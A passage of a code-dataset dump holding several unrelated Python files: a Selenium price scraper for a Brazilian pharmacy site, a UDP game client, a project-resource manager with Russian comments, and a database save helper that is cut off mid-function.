seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
71621333475 | from ast import Try
from dataclasses import replace
from os import rename
import sys
import time
from unicodedata import decimal
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from sqlalchemy import create_engine, text
from sqlalchemy.orm import Session
class CodigoTestado3():
def limparPreco(preco):
if preco == None or preco == '':
return -1
try:
preco = preco.replace('R$ ','')
preco = preco.replace(',','.')
preco = float(preco)
except:
preco = -1
return preco
# FUNCÕES PAGUE MENOS
def coletar_preco_paguemenos(medicamento, driver):
driver.get(medicamento['link'])
try:
preco = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.XPATH, '/html/body/div[2]/div/div[1]/div/div/div/div[4]/div/div/div/section/div/div/div/div[1]/div[2]/div/div[3]/div/div[5]/div/div[1]/div[1]/div/div[2]/div/div[2]/span/span'))
)
preco = preco.text
except:
try:
preco = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.XPATH, '/html/body/div[2]/div/div[1]/div/div/div/div[4]/div/div/div/section/div/div/div/div[1]/div[2]/div/div[3]/div/div[5]/div/div/div[1]/div/div[2]/div/div/span/span'))
)
preco = preco.text
except:
preco = '-1'
medicamento['preco'] = CodigoTestado3.limparPreco(preco)
def coletar_paguemenos(driver):
medicamentos_paguemenos = [
# {
# 'idfarmacia': 1,
# 'idmedicamento': 1,
# 'preco': -1
#}, #dipirona
{
'idfarmacia': 1,
'idmedicamento': 2,
'link': 'https://www.paguemenos.com.br/advil-400mg-leve-8-pague-6-capsulas/p',
'preco': -1
}, #advil
{
'idfarmacia': 1,
'idmedicamento': 3,
'link': 'https://www.paguemenos.com.br/engov-com-12-comprimidos/p',
'preco': -1
}, #engov
{
'idfarmacia': 1,
'idmedicamento': 4,
'link': 'https://www.paguemenos.com.br/neosaldina-com-10-drageas/p',
'preco': -1
}, #neosaldina
{
'idfarmacia': 1,
'idmedicamento': 5,
'link': 'https://www.paguemenos.com.br/dorflex-36-comprimidos/p',
'preco': -1
}, #dorflex
{
'idfarmacia': 1,
'idmedicamento': 6,
'link': 'https://www.paguemenos.com.br/novalgina-1g-10-comprimidos/p',
'preco': -1
}, #novalgina
{
'idfarmacia': 1,
'idmedicamento': 7,
'link': 'https://www.paguemenos.com.br/sal-de-fruta-eno-efervescente-2-saches-de-5g/p',
'preco': -1
}, #eno
{
'idfarmacia': 1,
'idmedicamento': 8,
'link': 'https://www.paguemenos.com.br/neosoro-solucao-nasal-adulto-com-30-ml/p',
'preco': -1
}, #neosoro
{
'idfarmacia': 1,
'idmedicamento': 9,
'link': 'https://www.paguemenos.com.br/merthiolate-spray-30ml/p',
'preco': -1
}, #mertthiolate
{
'idfarmacia': 1,
'idmedicamento': 10,
'link': 'https://www.paguemenos.com.br/estomazil-em-po-sem-sabor-5g-com-6-envelope/p',
'preco': -1
}, #estomazil
{
'idfarmacia': 1,
'idmedicamento': 11,
'link': 'https://www.paguemenos.com.br/allegra-60mg-com-10-comprimidos/p',
'preco': -1
}, #allegra
{
'idfarmacia': 1,
'idmedicamento': 12,
'link': 'https://www.paguemenos.com.br/descongestionante-vick-vaporub-30g/p',
'preco': -1
}, #vic vaborrub
{
'idfarmacia': 1,
'idmedicamento': 13,
'link': 'https://www.paguemenos.com.br/polaramine-2mg-caixa-com-20-comprimidos/p',
'preco': -1
}, #polaramine
{
'idfarmacia': 1,
'idmedicamento': 14,
'link': 'https://www.paguemenos.com.br/dramin-b6-com-30-comprimidos/p',
'preco': -1
}, #dramin
{
'idfarmacia': 1,
'idmedicamento': 15,
'link': 'https://www.paguemenos.com.br/espironolactona-25mg-com-30-comprimidos-generico-geolab/p',
'preco': -1
}, #espironolactona
{
'idfarmacia': 1,
'idmedicamento': 16,
'link': 'https://www.paguemenos.com.br/insulina-novolin-r-10ml/p',
'preco': -1
} #insulina
]
for medicamento in medicamentos_paguemenos:
CodigoTestado3.coletar_preco_paguemenos(medicamento, driver)
return medicamentos_paguemenos
def registrarDados(lista, sessao):
for preco in lista:
sessao.execute(text("INSERT INTO preco (numpreco, preco, idfarmacia, idmedicamento) VALUES (now(), :preco, :idfarmacia, :idmedicamento)"), preco)
| luanlara/CasosDeTeste4Sem | Caso3/codigoTestado3.py | codigoTestado3.py | py | 5,806 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "selenium.webdriver.support.ui.WebDriverWait",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.support... |
43502378799 | # -*- coding: utf-8 -*-
__author__ = 'apsmi'
import asynchat, socket, struct, pickle
IN_BUF_SIZE = 128 * (2**10) # размер входящего буфера сокета
OUT_BUF_SIZE = 128 * (2**10) # размер исходящего буфера сокета
LEN_TERM = 4
# сокет, принимающий соединение от клиентов
class Client(asynchat.async_chat):
def __init__(self, addr):
asynchat.async_chat.__init__(self)
self.ibuffer = []
self.obuffer = b""
self.imes = [] #b""
# создаем сокет
self.create_socket(socket.AF_INET, socket.SOCK_DGRAM)
self.bind(('', 0))
client_port = self.socket.getsockname()[1]
# подключаемся к диспетчеру, отправляем ему свой клиентский порт
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 0))
sock.sendto(struct.pack('L', client_port), addr)
# получем серверный udp порт
buf, _ = sock.recvfrom(4)
server_port = struct.unpack('L',buf)[0]
sock.close()
self.ac_in_buffer_size = IN_BUF_SIZE
self.ac_out_buffer_size = OUT_BUF_SIZE
self.addr = (addr[0], server_port)
self.set_terminator(LEN_TERM)
self.state = "len"
def handle_close(self):
#print(self.socket.getsockname())
self.close()
def writable(self):
return len(self.obuffer) > 0
def handle_write(self):
sent = self.sendto(self.obuffer, self.addr)
self.obuffer = self.obuffer[sent:]
def collect_incoming_data(self, data):
self.ibuffer.append(data)
def found_terminator(self):
dataframe = b"".join(self.ibuffer)
self.ibuffer = []
if self.state == "len":
self.state = "data"
length = struct.unpack('L',dataframe)[0]
self.set_terminator(length)
elif self.state == "data":
self.state = "len"
self.set_terminator(LEN_TERM)
self.imes.append(pickle.loads(dataframe))
if self.imes == "exit":
self.close() | apsmi/PyTanks | client_player.py | client_player.py | py | 2,210 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "asynchat.async_chat",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "asynchat.async_chat.__init__",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "asynchat.async_chat",
"line_number": 15,
"usage_type": "attribute"
},
{
"ap... |
8431592570 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Модуль класса управления ресурсом проекта.
Описание ресурсного файла проекта информационной системы:
<имя файла> := *.pro
<описание проекта информационной системы> =
[
{<описание проекта текущей информационной системы>},
{<описание проекта импортируемой информационной системы 1> }, Е ,
{ <описание проекта импортируемой информационной системы N> }
] //список
<описание проекта текущей информационной системы> =
{
'имя корневой папки проекта' : <значение папки> ,
'__py__' : <имя корневого пакета модулей питона, создаваемых в рамках текущего проекта>
'__ftl__' : <значение папки шаблонов форм>
'__mth__' : <значение папки методов>
'__env__' : <словарь дополнительных глобальных атрибутов проекта>
} // словарь
<значение папки> =
[
{'имя папки':<значение папки> / <тип ресурса> значения: 'tab' / 'var' / 'win' / 'mnu' / 'svb' / 'frm ' / 'src'}, Е {}
] //список словарей
<значение папки шаблонов форм> =
[
{'имя папки' : <значение папки> / <тип ресурса> значения: 'ftl'}, Е {}
] //список словарей
<значение папки методов> =
[
{'имя папки' : <значение папки> / <тип ресурса> значения: 'mth'}, Е {}
] //список словарей
<описание проекта импортируемой информационной системы> =
{ 'имя корневой папки проекта' : <значение папки> } // словарь
<значение папки> =
{
'type': <тип импортируемой информационной системы>
'name': <имя импортируемой информационной системы>
'__py__': <имя корневого пакета модулей питона, созданных в импортируемой информационной системе>
'link': <тип связи импортируемой информационной системы: определим тип связи импортируемой системы как ССЫЛКА, если информационные ресурсы импортируемой системы расположены НЕ в директории информационных ресурсов текущей системы; определим тип связи импортируемой системы как КОПИЯ, если информационные ресурсы импортируемой системы расположены в директории информационных ресурсов текущей системы; 1 - ССЫЛКА, 0 - КОПИЯ>
'path': <путь к файлу *.pro, содержащему описание структуры импортируемой информационной системы; если link=1, то указан полный путь, он дополняется значением ключа __py__ и используется при сборке, если link=0, то при сборке значение этого ключа не используется, а используется ключ __py__ для получения пути для сборки ресурсов>
}
Пример текущей информационной системы:
{'__py__':'icmodule','бухучет':
[ { 'базы данных':
[{'первичные документы':
[{'приходные':[{'ордер1':'tab'},{'фактура1':'tab'},{'счет-фактура1':'tab'}]},
{'расходные':[{'ордер2':'tab'},{'фактура2':'tab'},{'счет-фактура2':'tab'}]}
]
},
{'прочие':[{}, Е {}]}
]
},
{'переменные':[{},Е{}]}
]
}
<словарь дополнительных глобальных атрибутов проекта> =
{
'имя переменной' : <значение переменной хранимого типа>
}
Переменные и значения попадают в окружение проекта автоматически.
"""
import re
import os.path
import wx
from ic.dlg import dlgfunc
from ic.log import log
from ic.interfaces import resManager
from ic.utils import util
from ic.utils import resfunc
import ic
__version__ = (0, 1, 1, 1)
_ = wx.GetTranslation
# Константы
DEFAULT_PRJ_NAME = 'new_prj'
# Типы ресурсов ('tab','var','win','mnu','svb','frm')
class icPrjRes(resManager.icResourceManagerInterface):
"""
Класс управления ресурсом проекта.
"""
def __init__(self):
"""
Конструктор.
"""
resManager.icResourceManagerInterface.__init__(self)
# Файл проекта
self.prj_file_name = None
# Структура проекта
self._prj = []
def setResFileName(self, res_filename=None):
self.prj_file_name = res_filename
def newPrj(self, prj_name, py_pack=None, prj_template=None):
"""
Создание нового проекта по умолчанию.
:param prj_name: Имя проекта.
:param py_pack: Макет модулей питона.
:param prj_template: Шаблон для создания проекта.
"""
# Файл проекта
prj_res = {}
if prj_template is None:
prj_template = self._newPrjTemplate()
prj_res[prj_name] = prj_template
prj_res['__py__'] = py_pack
prj_res['__env__'] = {'AutoLogin': 'admin',
'AutoPassword': '',
'db_auth': '0',
'db_engine': 'PostgreSQLDB',
'convert_unicode': 'UTF-8',
'dbname': None,
'host': '127.0.0.1',
'user': 'admin',
'sys_table_name': 'resource_tab',
'password': '',
'port': '5432',
'dbstore': '.acc',
}
# Добавить в основную структуру
self._prj = [prj_res]
return prj_res
def _newPrjTemplate(self):
"""
Шаблон нового проекта по умолчанию.
"""
return [{'DB': []},
{'Tables': []},
{'Menu': []},
{'System': []},
{'Forms': []},
{'Metadata': []},
]
def openPrj(self, prj_filename):
"""
Открыть файл проекта.
"""
path, name = os.path.split(prj_filename)
ic.set_ini_file(path)
self.prj_file_name = prj_filename
if os.path.isfile(self.prj_file_name) and os.path.exists(self.prj_file_name):
prj = util.readAndEvalFile(self.prj_file_name, bRefresh=True)
self._prj = self._prepareDataPrj(prj)
# Один метод под двумя именами
load = openPrj
def savePrj(self):
"""
Сохранить проект.
"""
if not self.prj_file_name:
self.prj_file_name = dlgfunc.getFileDlg(None, u'Создание проекта',
u'Project file (*.pro)|*.pro')
if self.prj_file_name:
prj_path = os.path.dirname(self.prj_file_name.strip())
if (not os.path.isdir(prj_path)) or \
(not self._prj[0]['__py__']):
# Если директории проекта не существует, то
# сохранить ее в __py__
self._prj[0]['__py__'] = prj_path
return self._save_prj(self.prj_file_name.strip(), self._prepareDataPrj(self._prj))
return False
# Один метод под двумя именами
save = savePrj
def _prepareDataPrj(self, project):
"""
Подготовка данных проекта для записи/чтения.
"""
if isinstance(project, dict):
project = dict([(key.strip(), self._prepareDataPrj(value)) for key, value in project.items()])
elif isinstance(project, list):
project = [self._prepareDataPrj(value) for value in project]
elif isinstance(project, tuple):
project = tuple([self._prepareDataPrj(value) for value in project])
elif isinstance(project, str):
project = project.strip()
return project
def _save_prj(self, prj_filename, project=None):
"""
Непосредственное сохранение проекта.
:param prj_filename: Имя файла проекта.
:param project: Структура проекта.
:return: Возвращает результат выполнения True/False.
"""
if project is None:
project = self._prepareDataPrj(self._prj)
ok = resfunc.saveResourceText(prj_filename.strip(), project)
# Кроме того, что сохраняем проект, еще делаем его пакетом
resfunc.createInitFile(os.path.dirname(prj_filename.strip()))
return ok
def getPrjRes(self):
return self._prj
def addFolder(self, new_folder_name, dst_folder_name, cur_folder=None):
"""
Добавить папку.
:param new_folder_name: Имя новой папки.
:param dst_folder_name: Имя папки или проекта,
в которую будет добавляться новая папка.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Результат добавления True|False.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
# Если имя папки==имя проекта, то просто добавить
# папку в проект
if dst_folder_name == self.getPrjRootName():
self.getPrjRoot().append({new_folder_name: []})
return True
ok = False
for folder in cur_folder:
folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[folder_name], list):
if folder_name == dst_folder_name:
folder[folder_name].append({new_folder_name: []})
ok = True
return ok
else:
add = self.addFolder(new_folder_name, dst_folder_name, folder[folder_name])
if add:
return add
return ok
def addRes(self, new_res_name, res_type, dst_folder_name, cur_folder=None):
"""
Добавить ресурс.
:param new_res_name: Имя нового ресурса.
:param res_type: Тип ресурса ('tab','var','win','mnu','svb','frm').
:param dst_folder_name: Имя папки или проекта,
в которую будет добавляться новая папка.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Результат добавления True|False.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
ok = False
for folder in cur_folder:
folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[folder_name], list):
if folder_name == dst_folder_name:
folder[folder_name].append({new_res_name: res_type})
return True
else:
add = self.addRes(new_res_name, res_type, dst_folder_name, folder[folder_name])
if add:
return add
return ok
def delFolder(self, del_folder_name, cur_folder=None):
"""
Удалить папку с именем.
:param del_folder_name: Имя удаляемой папки.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: True-успешное удаление. False-не удален.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
del_ok = False
for i_folder in range(len(cur_folder)):
folder = cur_folder[i_folder]
folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[folder_name], list):
if folder_name == del_folder_name:
del cur_folder[i_folder]
return True
else:
delete_ok = self.delFolder(del_folder_name, folder[folder_name])
if delete_ok:
return delete_ok
return del_ok
def getFolder(self, folder_name, cur_folder=None):
"""
Взять папку с именем.
:param folder_name: Имя папки.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Список папки в ресурсе проекта.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
for i_folder in range(len(cur_folder)):
folder = cur_folder[i_folder]
cur_folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[cur_folder_name], list):
if cur_folder_name == folder_name:
return cur_folder[i_folder]
else:
find_fld = self.getFolder(folder_name, folder[cur_folder_name])
if find_fld is not None:
return find_fld
return None
def getFolderBody(self, folder_name, cur_folder=None):
"""
Взять содержимое папки с именем.
:param folder_name: Имя папки.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Список папки в ресурсе проекта.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
for i_folder in range(len(cur_folder)):
folder = cur_folder[i_folder]
cur_folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[cur_folder_name], list):
if cur_folder_name == folder_name:
return cur_folder[i_folder][folder_name]
else:
find_fld = self.getFolderBody(folder_name, folder[cur_folder_name])
if find_fld is not None:
return find_fld
return None
def delRes(self, res_name, res_type=None, cur_folder=None):
"""
Удалить ресурс по имени и типу.
:param res_name: Имя ресурса.
:param res_type: Тип ресурса, если None,
то проверка на тип не производится.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: True-успешное удаление. False-не удален.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
del_ok = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
# Проверять только папки
if isinstance(res[cur_res_name], list):
find_res = self.delRes(res_name, res_type, res[cur_res_name])
if find_res:
return find_res
else:
if cur_res_name == res_name and res[cur_res_name] == res_type:
del cur_folder[i_res]
return True
elif cur_res_name == res_name and not res_type:
del cur_folder[i_res]
return True
return del_ok
def getResRef(self, res_name, res_type=None, cur_folder=None):
"""
Получить кортеж указания ресурса по имени и типу.
:param res_name: Имя ресурса.
:param res_type: Тип ресурса, если None,
то проверка на тип не производится.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Кортеж (Имя ресурса, тип ресурса) или None в случае ошибки.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
ret_res = None
for res in cur_folder:
cur_res_name = list(res.keys())[0]
# Проверять только папки
if isinstance(res[cur_res_name], list):
find_res = self.getResRef(res_name, res_type, res[cur_res_name])
if find_res:
return find_res
else:
if cur_res_name == res_name and res[cur_res_name] == res_type:
return cur_res_name, res[cur_res_name]
elif cur_res_name == res_name and res_type is None:
return cur_res_name, res[cur_res_name]
if ret_res is None:
log.warning(u'Не найден ресурс <%s.%s> %s' % (res_name, res_type, str(cur_folder)))
return ret_res
def getImportSystems(self):
"""
Список импортируемых подсистем.
"""
return self._prj[1:]
def getPyPackage(self):
"""
Пакет модулей питона текущего проекта.
"""
return self._prj[0]['__py__']
def getPrjRootName(self):
"""
Имя корневой папки проекта.
"""
root = self._prj[0]
names = [key for key in root.keys() if not key.startswith('_')]
return names[0]
def setPrjRootName(self, new_prj_root_name):
"""
Имя корневой папки проекта.
"""
new_prj_root_name = new_prj_root_name
root = self._prj[0]
names = [key for key in root.keys() if not key.startswith('_')]
old_prj_root_name = names[0]
prj_root = root[old_prj_root_name]
del self._prj[0][old_prj_root_name]
self._prj[0][new_prj_root_name] = prj_root
def getPrjRoot(self):
"""
Корневая папка проекта.
"""
if not self._prj:
self.newPrj(DEFAULT_PRJ_NAME)
return self._prj[0][self.getPrjRootName()]
def getPyPackageImportSys(self, import_sys):
"""
Пакет модулей питона импортироуемой системы.
"""
return None
def addPackage(self, package_path, new_package_name=None):
"""
Добавить пакет модулей в дерево проектов.
:param package_path: Путь пакета.
:param new_package_name: Имя нового пакета.
:return: Результат добавления True|False.
"""
cur_package_path = package_path
if new_package_name:
cur_package_path = os.path.join(cur_package_path, new_package_name)
return resfunc.createInitFile(cur_package_path)
def addModule(self, module_name, package_path):
"""
Добавить модуль в дерево проектов.
:param module_name: Имя модуля.
:param package_path: Путь пакета.
"""
pass
def renameRes(self, old_name, new_name, cur_folder=None):
"""
Переименовать ресурс/папку.
:param old_name: Старое имя.
:param new_name: Новое имя.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Возвращает результат выполнения переименования.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
rename_res = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
res_name = list(res.keys())[0]
if res_name == old_name:
cur_folder[i_res] = {new_name: res[res_name]}
return True
elif isinstance(res[res_name], list):
# Если это папка, то обработать все подпапки
rename_res = self.renameRes(old_name, new_name, res[res_name])
if rename_res:
return rename_res
return rename_res
def newSubSys(self, subsys_name, subsys_prj_filename, py_pack):
"""
Создать новую импортируемую подсистему.
:param subsys_name: Имя импортируемой подсистемы.
:param subsys_prj_filename: Файл импортируемой подсистемы.
:param py_pack: Пакет импортируемой подсистмы.
"""
imp_sys = {'name': subsys_name,
'type': 'icSubSys',
'__py__': py_pack,
'link': 0,
'path': subsys_prj_filename}
# Добавить в проект
self._prj.append(imp_sys)
return imp_sys
def isResORFolderByName(self, name, cur_folder=None):
"""
Проверка, есть ли ресурс или папка с таким именем в проекте.
:param name: Имя.
:return: Возвращает результат операции True/False.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
res_name = list(res.keys())[0]
if res_name == name:
return True
elif isinstance(res[res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.isResORFolderByName(name, res[res_name])
if find_folder:
return find_folder
return find
def isResByNameANDType(self, name, res_type=None, cur_folder=None):
"""
Проверка, есть ли ресурс с таким именем и типом в проекте.
:param name: Имя.
:param res_type: Строковое определение типа ресурса 'tab','frm',...
Если тип None, то проверка по типу не делается.
:return: Возвращает результат операции True/False.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
cur_res_type = res[cur_res_name]
if isinstance(res[cur_res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.isResByNameANDType(name, res_type, res[cur_res_name])
if find_folder:
return find_folder
elif cur_res_name == name and cur_res_type == res_type:
return True
elif cur_res_name == name and res_type is None:
return True
return find
def getResNameListByType(self, res_type, cur_folder=None):
"""
Список имен ресурсов в проекте по их типу.
:param res_type: Строковое определение типа ресурса 'tab','frm',...
:return: Возвращает список имен ресурсов заданного типа.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find_list = []
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
cur_res_type = res[cur_res_name]
if isinstance(res[cur_res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.getResNameListByType(res_type, res[cur_res_name])
if find_folder:
find_list += find_folder
elif cur_res_type == res_type:
find_list.append(cur_res_name)
return find_list
def getResNameListByTypes(self, res_types, cur_folder=None):
"""
Список имен ресурсов в проекте по их типу.
:param res_types: Кортеж строковых определение типа ресурса 'tab','frm',...
:return: Возвращает список имен ресурсов заданных типов.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find_list = []
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
cur_res_type = res[cur_res_name]
if isinstance(res[cur_res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.getResNameListByTypes(res_types, res[cur_res_name])
if find_folder:
find_list += find_folder
elif cur_res_type in res_types:
find_list.append(cur_res_name)
return find_list
def getResNamesByTypes(self, *res_types):
"""
Список имен ресурсов в проекте по их типу.
:param res_types: Кортеж строковых определение типа ресурса 'tab','frm',...
:return: Возвращает список имен ресурсов заданных типов.
"""
return self.getResNameListByTypes(*res_types)
def getResFileNamesByResPattern(self, res_pattern, cur_folder=None):
"""
Список имен файлов ресурсов по шаблону ресурса.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:return: Список имен файлов ресурсов по шаблону ресурса.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find_list = []
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
res_name = list(res.keys())[0]
res_type = res[res_name]
if isinstance(res[res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.getResFileNamesByResPattern(res_pattern, res[res_name])
if find_folder:
find_list += find_folder
else:
res_file_name = u''
try:
res_file_name = res_name+'.'+res_type
if [pattern for pattern in res_pattern if re.match(pattern, res_file_name)]:
# Если имя файла подходит под какойлибо шаблон,
# то добавитьв выходной список
find_list.append(res_file_name)
except:
log.fatal(u'Ошибка поиска файла <%s> по шаблону <%s>' % (res_file_name, res_pattern))
return find_list
def getObjectsByResPattern(self, *res_pattern):
"""
Получить список кортежей (тип объекта,имя объекта) по шаблону ресурса.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:return: Список кортежей (тип объекта,имя объекта) по шаблону ресурса.
"""
obj_list = []
res_file_names = self.getResFileNamesByResPattern(res_pattern)
prj_dir = os.path.dirname(self.prj_file_name)
for res_file_name in res_file_names:
full_res_file_name = os.path.join(prj_dir, res_file_name)
spc = util.readAndEvalFile(full_res_file_name, bRefresh=True)
obj = (spc['type'], spc['name'], spc['description'])
obj_list.append(obj)
return obj_list
def getObjNamesByResPattern(self, *res_pattern):
"""
Имена объектов по шаблону ресурсов.
"""
return [obj[1] for obj in self.getObjectsByResPattern(*res_pattern)]
def getObjectsInResByType(self, res_filename, obj_type, cur_obj=None):
"""
Поиск объектов в ресурсе по типу.
:param res_filename: Имя файла ресурса.
:param OBjType_: Тип объекта, например 'icButton'.
:return: Список кортежей формата:
[('тип объекта','имя объекта','описание'),...]
"""
if cur_obj is None:
spc = util.readAndEvalFile(res_filename, bRefresh=True)
cur_obj = spc[list(spc.keys())[0]]
find_list = []
try:
if cur_obj is None:
# Ресурс пустой
return find_list
if cur_obj['type'] == obj_type:
find_list.append((cur_obj['type'], cur_obj['name'], cur_obj['description']))
if 'child' in cur_obj and cur_obj['child']:
for child in cur_obj['child']:
find_grp = self.getObjectsInResByType(res_filename, obj_type, child)
find_list += find_grp
except:
log.fatal(u'Search error in function getObjectsInResByType: %s, %s, %s' % (res_filename, obj_type, cur_obj))
return find_list
def getObjectsInResByTypes(self, res_filename, obj_types, cur_obj=None):
"""
Поиск объектов в ресурсе по типу.
:param res_filename: Имя файла ресурса.
:param OBjTypes_: Кортеж типов объектов, например ('icButton',).
:return: Список кортежей формата:
[('тип объекта','имя объекта','описание'),...]
"""
if cur_obj is None:
spc = util.readAndEvalFile(res_filename, bRefresh=True)
cur_obj = spc[list(spc.keys())[0]]
find_list = []
try:
if cur_obj is None:
# Ресурс пустой
return find_list
if cur_obj['type'] in obj_types:
find_list.append((cur_obj['type'], cur_obj['name'], cur_obj['description']))
if 'child' in cur_obj and cur_obj['child']:
for child in cur_obj['child']:
find_grp = self.getObjectsInResByTypes(res_filename, obj_types, child)
find_list += find_grp
except:
log.fatal(u'Search error in function getObjectsInResByTypes: (%s, %s, %s)' % (res_filename,
obj_types, cur_obj))
return find_list
def getObjByResPatternANDType(self, res_pattern, obj_type):
"""
Получить список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:param obj_type: Тип объекта. Например 'icButton'.
:return: Список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
"""
obj_list = []
res_file_names = self.getResFileNamesByResPattern(res_pattern)
prj_dir = os.path.dirname(self.prj_file_name)
for res_file_name in res_file_names:
full_res_file_name = os.path.join(prj_dir, res_file_name)
obj_lst = self.getObjectsInResByType(full_res_file_name, obj_type)
obj_list += obj_lst
return obj_list
def getObjByResPatternANDTypes(self, res_pattern, obj_types):
"""
Получить список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:param obj_types: Кортеж типов объектов, например ('icButton',).
:return: Список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
"""
obj_list = []
res_file_names = self.getResFileNamesByResPattern(res_pattern)
prj_dir = os.path.dirname(self.prj_file_name)
for res_file_name in res_file_names:
full_res_file_name = os.path.join(prj_dir, res_file_name)
obj_lst = self.getObjectsInResByTypes(full_res_file_name, obj_types)
obj_list += obj_lst
return obj_list
def isModByName(self, module_name):
"""
Проверить, есть ли модуль с таким именем.
:param module_name: Имя модуля.
:return: Возвращает результат операции True/False.
"""
return False
def isImpSubSys(self, name):
"""
Проверить, является ли name именем импортируемой подсистемы.
:param name: Имя некого ресурса.
:return: Возвращает True/False.
"""
return bool([sub_sys for sub_sys in self.getImportSystems() if sub_sys['name'] == name])
def getImpSubSysIdx(self, name):
"""
Возвращает индекс импортируемой подсистемы по имени.
:param name: Имя подсистемы.
:return: Индекс в структуре ресурсного файла импортируемой подсистемы
с именем name или -1, если такая подсистема в описании не найдена.
"""
find_idx = -1
try:
name_list = ['']+[sub_sys['name'] for sub_sys in self.getImportSystems()]
find_idx = name_list.index(name)
except ValueError:
log.fatal()
find_idx = -1
return find_idx
def delImpSubSys(self, name, bAutoSave=True):
"""
Удалить из файла *.pro импортируемую подсистему по имени.
:param name: Имя подсистемы.
:param bAutoSave: Автоматически сохранить файл *.pro после удаления.
:return: Возвращает True/False.
"""
try:
sub_sys_idx = self.getImpSubSysIdx(name)
if sub_sys_idx > 0:
del self._prj[sub_sys_idx]
if bAutoSave:
self.save()
return True
except:
log.fatal()
return False
def getPrjEnv(self):
"""
Получить словарь дополнительных атрибутов проекта.
"""
if '__env__' in self._prj[0]:
return self._prj[0]['__env__']
return {}
def setPrjEnv(self, env):
"""
Установить словарь дополнительных атрибутов проекта.
"""
self._prj[0]['__env__'] = env
def test():
"""
Функция тестирования.
"""
prj_res = icPrjRes()
prj_res.newPrj('root', None, None, None)
print(prj_res.getPrjRes())
prj_res.addRes('tab1', 'tab', u'Формы')
print(prj_res.getPrjRes())
if __name__ == '__main__':
test()
| XHermitOne/defis3 | ic/prj/PrjRes.py | PrjRes.py | py | 39,301 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "wx.GetTranslation",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "ic.interfaces.resManager.icResourceManagerInterface",
"line_number": 99,
"usage_type": "attribute"
},
{
"api_name": "ic.interfaces.resManager",
"line_number": 99,
"usage_type... |
41094600245 | # savers
from sqlalchemy import exc
from src import db_manager
def save_page_to_db(page):
try:
db_manager.session.add(page)
db_manager.session.commit()
except exc.SQLAlchemyError as e:
db_manager.handel_exception(e, True, 'save_page', page.url)
return True
def save_site_to_db(site):
try:
db_manager.session.add(site)
db_manager.session.commit()
except exc.SQLAlchemyError as e:
